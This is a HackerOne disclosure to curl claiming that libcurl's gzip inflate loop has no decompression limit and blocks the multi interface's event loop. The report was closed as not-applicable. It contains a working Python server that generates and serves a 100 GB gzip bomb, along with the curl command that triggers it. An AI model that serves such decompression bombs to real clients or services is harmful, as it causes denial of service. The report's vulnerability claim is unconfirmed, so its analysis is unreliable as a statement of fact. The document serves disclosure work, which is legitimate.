Unbounded GZIP Decompression Leading to Event-Loop Starvation

Disclosed: 2026-03-31 05:51:39 By ok3y To curl
Medium
Vulnerability Details
When libcurl is configured to decompress HTTP responses (via `CURLOPT_ACCEPT_ENCODING` or the `--compressed` CLI flag), it lacks decompression bounds checking or a mechanism to yield execution during massive expansion tasks. If an attacker provides a highly compressed payload (zip bomb), libcurl's underlying core function `inflate_stream()` in `lib/content_encoding.c` will process the decompression in an unbounded, synchronous `while(!done)` loop. For backend services utilizing libcurl's non-blocking I/O interface (`curl_multi_perform`), this forces the library to synchronously decompress gigabytes or terabytes of data without yielding control back to the application's event loop. This leads to complete thread starvation and denial of service (DoS) for all other active transfers handled by that multi handle. ## Summary: The vulnerability resides in how libcurl handles the zlib inflate loop. The loop iterates synchronously until the currently buffered encoded chunk is fully decompressed. An attacker can stream a 100 MB highly compressed payload that mathematically expands to 100 Gigabytes or even Terabytes natively. Because libcurl enforces zero limits on the decompression ratio (nor does it pause to return control to the caller during massive Z_OK iterations), the CPU core running the multi interface becomes 100% blocked. This is highly disruptive for microservices, webhooks, or automated systems leveraging libcurl under the hood with compression enabled to save bandwidth. [six or fewer sentences describing the issue and optionally a short proof-of-concept script] ## Affected version curl 8.19.0 (x86_64-pc-linux-gnu) libcurl/8.19.0 ## Steps To Reproduce: To cleanly demonstrate the severity within the context of CPU starvation (and avoid simply filling a disk), i provide a self-contained PoC generating a 100GB decompression bomb dynamically. In a real-world scenario targeting a backend service, the application's thread will freeze entirely. ### Step 1: Save the Malicious Server Script Save the following python script as `server_bomb.py`. This script dynamically generates a custom gzip payload engineered to expand to exactly 100 Gigabytes of zeros. ```python #!/usr/bin/env python3 import gzip import io import sys from http.server import HTTPServer, BaseHTTPRequestHandler print("[*] Generating 100GB decompression bomb...") # Generate a highly compressed 100GB payload in memory buf = io.BytesIO() with gzip.GzipFile(fileobj=buf, mode='wb', compresslevel=9) as f: chunk = b'0' * (1024 * 1024) # 1 MB of zeros for _ in range(100 * 1024): # Write 102,400 times (100 GB total) f.write(chunk) BOMB_DATA = buf.getvalue() class MaliciousServer(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-Type', 'application/octet-stream') self.send_header('Content-Encoding', 'gzip') self.send_header('Content-Length', str(len(BOMB_DATA))) self.end_headers() self.wfile.write(BOMB_DATA) print(f"[!] Victim requested {self.path}. 100GB Payload delivered!") def log_message(self, format, *args): pass if __name__ == '__main__': host, port = '127.0.0.1', 8080 print(f"\n[*] Malicious Server running at: http://{host}:{port}/") try: HTTPServer((host, port), MaliciousServer).serve_forever() except KeyboardInterrupt: sys.exit(0) ``` ### Step 2: Start the Malicious Server ```bash python3 server_bomb.py ``` ### Step 3: Trigger the Vulnerability with Curl To simulate a libcurl application fetching the payload and discarding it (or piping it to a null sink), we use the CLI. We time the operation to demonstrate the CPU lock. ```bash time curl --compressed http://127.0.0.1:8080/ -o /dev/null ``` ### Step 4: Validate the Impact Despite transferring a very small payload over the network loopback, the curl process immediately locks the CPU core at 100% utilization. A typical CLI user may easily interrupt this, but a backend application process executing `curl_multi_perform` will be completely deadlocked. The thread will spend minutes (or hours if scaled to Terabytes) exclusively in user-space CPU executing zlib routines. ### Deeper Code-Level Analysis (Cause and Effect) The root issue exists in `lib/content_encoding.c` within the `inflate_stream()` handler: ```c /* Because the buffer size is fixed, iteratively decompress and transfer to the client via next_write function. */ while(!done) { z->next_out = (Bytef *)zp->buffer; z->avail_out = DECOMPRESS_BUFFER_SIZE; /* rigidly set to 16KB */ status = inflate(z, Z_BLOCK); if(z->avail_out != DECOMPRESS_BUFFER_SIZE) { if(status == Z_OK || status == Z_STREAM_END) { result = Curl_cwriter_write(data, writer->next, type, zp->buffer, DECOMPRESS_BUFFER_SIZE - z->avail_out); ... ``` **Cause and Effect:** The `while(!done)` loop executes continuously as long as `inflate()` returns `Z_OK` for the provided input chunk. Because `z->avail_out` is statically constrained to 16 KB, expanding a 100 GB payload forces `libcurl` to natively execute 6,553,600 consecutive loop iterations block-by-block. Crucially, libcurl does not yield back to the application's event loop during this expansion. It violates the promise of non-blocking I/O for `multi` handles, as the execution thread is hijacked purely by CPU decompression tasks. ## Impact What security impact can an attacker achieve? An attacker can orchestrate a targeted denial of service (DoS) against backend services, automated crawlers, webhooks, or headless systems integrating libcurl with `CURLOPT_ACCEPT_ENCODING` enabled. ## Summary: The primary threat is CPU Starvation / Thread Blocking in backend applications. - **Event-Loop Blockade in libcurl integrations:** Applications using the non-blocking `multi` interface will freeze. A single maliciously crafted URL blocks the main dispatch thread indefinitely, starving all other concurrent network operations handled by that instance. - **Realistic Threat Model:** While a CLI user fetching a file will merely experience a hanging terminal (easily breakable), backend microservices fetching external avatars, RSS feeds, or webhook endpoints with compression enabled (a standard practice to save bandwidth) will suffer total worker node exhaustion.
Actions
View on HackerOne
Report Stats
  • Report ID: 3632427
  • State: Closed
  • Substate: not-applicable
  • Upvotes: 1
Share this report